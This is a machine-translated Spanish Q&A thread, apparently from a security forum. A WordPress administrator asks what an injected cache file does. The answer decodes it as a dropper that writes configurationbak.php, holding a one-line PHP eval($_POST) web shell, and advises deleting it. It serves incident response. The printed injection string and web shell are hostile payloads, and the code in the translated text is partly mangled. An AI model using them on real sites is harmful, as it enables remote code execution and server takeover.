¿Podría alguien ayudarme a desenfocar este código de script malicioso [duplicar]

3

Hace dos meses, uno de nuestros sitios de Wordpress fue infestado hasta el final. Esto fue al mismo tiempo que empecé a trabajar en esta empresa. Nuestra plataforma principal es Plone, pero creo que hicieron algunos proyectos sobre la marcha usando Wordpress en el pasado. Esos sitios se descuidaron y la carga del mantenimiento cayó sobre mí. Sin embargo, no me importa, es la posición de entrada y aprendo mucho a diario. Escanee el sitio con WordFence, escribí algunos scripts de limpieza, cambié todas las contraseñas, eliminé el usuario de administrador forzado (sí, llegó tan lejos), revisé la base de datos, aumenté la seguridad del directorio de carga ... Mientras limpiaba el sitio, Google etiquetó el sitio para contenido malicioso (desagradable gran advertencia roja). Después de completar la limpieza, envié una solicitud para volver a escanear y se eliminó el indicador de advertencia. La fuente de la infestación fue un complemento falso (no tengo idea de quién o por qué lo instaló), y dice que se eliminó con el resto del código infestado.

Desde entonces, el negocio era tan normal como lo permite Wordpress. Todavía tenemos muchos intentos de fuerza bruta; Me imagino que el dominio se agregó a un "registro de sombrero negro", pero está bien, ya que las contraseñas son muy estrictas y he establecido el límite de intentos más la consecuente prohibición de IP.

Bueno, hoy recibí un aviso de WordFence sobre el archivo infestado. Mi presión arterial se elevó como un globo lleno de helio. Después de la investigación descubrí que era un solo archivo:

wp-content / cache / meta / wp-cache-d5959f8ceb4b5dc5c5a03125b3d61348.php

Y nada más fue impactado, parece. Pero no puedo estar seguro hasta que sepa lo que este archivo intentaba lograr. ¿Podría alguien echar un vistazo y tal vez proporcionar un enlace a recursos que describan cómo es posible que alguien cargue este pedazo de ... código no deseado? ¿Estoy tratando con plugin falso de nuevo? He limpiado todo y sellado la puerta trasera :(

enlace

He cambiado el dominio a www.somedomain.com.

Perdón por la introducción larga, solo quería aclarar mi posición y descartar las suposiciones acerca de cualquier motivo alternativo; he visto que a alguien más le hace una pregunta similar sin información de fondo.

    
pregunta kamenjan 09.04.2016 - 16:11
fuente

1 respuesta

4

Parece que tienes contenido web malicioso allí. Podría ser útil dedicar algún tiempo a aprender sobre cookies y PHP . Esta es una cookie codificada manualmente, y se refiere a otros dos códigos del lado del servidor (probablemente también código PHP):

  1. "/configurationbak.php"
  2. "/"

Probablemente el segundo archivo resulte ser index.php. Me gustaría comprobar si hay contenido malicioso en esos dos archivos. En particular, esta cookie pasa variables a esos dos scripts PHP utilizando la URL y el método GET para pasar datos. Cuando descodifica la cadena GET utilizando una herramienta como Decodificador de URL , obtiene lo siguiente:

  

"uri": "www.somedomain.com/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo   '- > |'; file_put_contents ($ _ SERVER ['DOCUMENT_ROOT']. '/ configurationbak.php', base64_decode ('PD9waHAgZXZhbCgkX1BPU1RbMV0pO8>')); echo   '| < -'; "," blog_id ": 1," post ": 7," key ":" www.somedomain.com80/?1=@ini_set ("display_errors", "0"); @ set_time_limit ( 0); @ set_magic_quotes_runtime (0); echo   '- > |'; file_put_contents ($ _ SERVER ['DOCUMENT_ROOT']. '/ configurationbak.php', base64_decode ('PD9waHAgZXZhbCgkX1BPU1RbMV0pO8>')); echo   '| < -'; "

Hay algo más de ofuscación aquí. La llamada a base64_decode convertirá la cadena 'PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8 +' a lo siguiente:

  

"<? php eval ($ _ POST 1 );? >"

La herramienta de conversión que utilicé para la decodificación es Decodificación de Base 64 .

Esto parece una especie de exploit inteligente de WordPress que convence de forma recurrente a su página web para ejecutar el código del pirata informático para que puedan acceder a su intérprete de PHP.

Para estar seguro, debe eliminar este archivo y estar atento a los archivos PHP adicionales creados por exploits como este (es decir, configurationbak.php).

    
respondido por el Brent Kirkpatrick 09.04.2016 - 16:32
fuente

Lea otras preguntas en las etiquetas